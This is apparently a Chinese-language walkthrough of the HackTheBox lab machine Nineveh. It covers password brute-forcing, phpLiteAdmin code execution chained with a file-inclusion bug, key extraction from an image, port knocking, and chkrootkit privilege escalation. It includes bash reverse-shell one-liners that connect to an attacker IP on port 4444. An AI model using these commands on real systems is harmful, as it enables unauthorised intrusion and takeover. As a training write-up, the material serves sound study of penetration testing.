HackTheBox-Machines--Nineveh

news2024/11/20 3:18:07

Nineveh测试过程

1 信息收集

NMAP 端口扫描

在这里插入图片描述

80 端口

80端口是服务器的默认页面，无可利用功能点，源代码没有可利用的敏感信息

在这里插入图片描述

目录扫描

在这里插入图片描述

1.http://10.129.25.123/department

访问/department目录跳转到登录页面，尝试暴力破解，获取到账号密码：admin 1q2w3e4r5t

在这里插入图片描述

登录后页面显示存在 /serect文件夹、amrois用户

在这里插入图片描述

2.http://10.129.25.123/info.php

在这里插入图片描述

443 端口

443端口是一张图片，无其他可利用点

在这里插入图片描述

目录扫描

访问 /secure_notes、/server-status 目录与 https://10.129.25.123/ 页面相同

1.https://10.129.25.123/db

在这里插入图片描述

页面显示 phpLiteAdmin v1.9 ，可以搜索其相关漏洞

在这里插入图片描述

1.9.3 版本存在一个远程命令执行漏洞，攻击者可以创建一个带有php扩展名的sqlite数据库，并将php代码作为文本字段插入。完成后，攻击者可以通过使用web浏览器访问数据库文件来执行它。

在这里插入图片描述

暴力破解

创建sqllite数据库需要登录https://10.129.25.123/db，尝试进行暴力破解

在这里插入图片描述

使用hydra工具进行暴力破解，登录页面需要猜解password字段，用户名可以随意指定，爆破密码 password123

2 phpLiteAdmin 1.9.3 版本远程命令执行漏洞

创建一个 .php 结尾的数据库

在这里插入图片描述

将php代码作为文本字段插入

在这里插入图片描述

访问 /var/tmp/test.php

但是出现了一个问题：如何访问 /car/tmp/test.php

在这里插入图片描述

在Notes按钮，发现 http://10.129.25.123/department/manage.php?notes=files/ninevehNotes.txt 路径；

http://10.129.25.123/department/manage.php?notes=/var/tmp/txt.php&cmd=ls 执行失败

测试

在通过文件包含执行我们的数据库文件时，LFI 需要名称 ninevehNotes，重新将数据库名称更改为 ninevehNotes.php

在这里插入图片描述

http://10.129.25.123/department/manage.php?notes=/ninevehNotes/../var/tmp/ninevehNote.php&cmd=id 执行成功

在这里插入图片描述

反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.14.25/4444 0>&1 &'

在这里插入图片描述

3 横向移动

www-data 到 amrois

之前访问 /department 发现存在一个用户 amrois，查看 /etc/passwd 进行确定

在这里插入图片描述

查找 amrois 可访问的文件

find / -user amrois \( -readable -o -writable \) 2>/dev/null

在这里插入图片描述

在文件中查找 amrois，并在 /var/www 目录中发现 nineveh.png

cd /var/www
grep -lir amrois . 2>/dev/null

在这里插入图片描述

将 nineveh.png 文件下载到本地进行查看

在这里插入图片描述

使用 strings 命令查找可打印的字符串，发现 amrois 用户以及一个 SSH 密钥，猜测此密钥为用户amrois私钥

在这里插入图片描述

但是使用私钥进行ssh访问时失败

端口敲击

查找 ssh登录 失败原因

查看进程：

www-data@nineveh:/tmp$ ps aux
ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1315  0.7  0.3   8756  3860 ?        Ss   02:45   8:03 /usr/sbin/knockd -d -i ens160

knockd 是一个用于端口敲击的守护进程，当某些端口被按顺序敲击时，将设置某些防火墙规则。

查看 knockd 配置文件 ``
在这里插入图片描述

配置文件显示：5秒内通过输入 571、290、911 和 syns 来打开 SSH，这样做之后，它会添加一条防火墙规则以允许我的IP 访问端口 22。

使用如下命令，循环遍历三个端口：

for x in 571 290 911 22;do nmap -Pn --max-retries 0 -p $x 10.129.25.123; done

(base) gryphon@wsdl Demo %for x in 571 290 911 22;do nmap -Pn --max-retries 0 -p $x 10.129.25.123; done
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-29 19:11 CST
Warning: 10.129.25.123 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.129.25.123
Host is up.

PORT    STATE    SERVICE
571/tcp filtered umeter

Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-29 19:11 CST
Warning: 10.129.25.123 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.129.25.123
Host is up.

PORT    STATE    SERVICE
290/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-29 19:11 CST
Warning: 10.129.25.123 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.129.25.123
Host is up.

PORT    STATE    SERVICE
911/tcp filtered xact-backup

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-29 19:11 CST
Nmap scan report for 10.129.25.123
Host is up (0.43s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds

ssh登录成功

在这里插入图片描述

4 权限提升

使用 pspy 工具对服务器进行信息收集

在这里插入图片描述

发现 chkrookit， 0.50 之前的 chkrootkit 将运行任何以 root 命名的/tmp/update可执行文件，从而进行权限提升。

在这里插入图片描述

amrois@nineveh:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.25/4444 0>&1'
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.225/4444 0>&1
amrois@nineveh:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.25/4444 0>&1' > update
amrois@nineveh:/tmp$ chmod +x update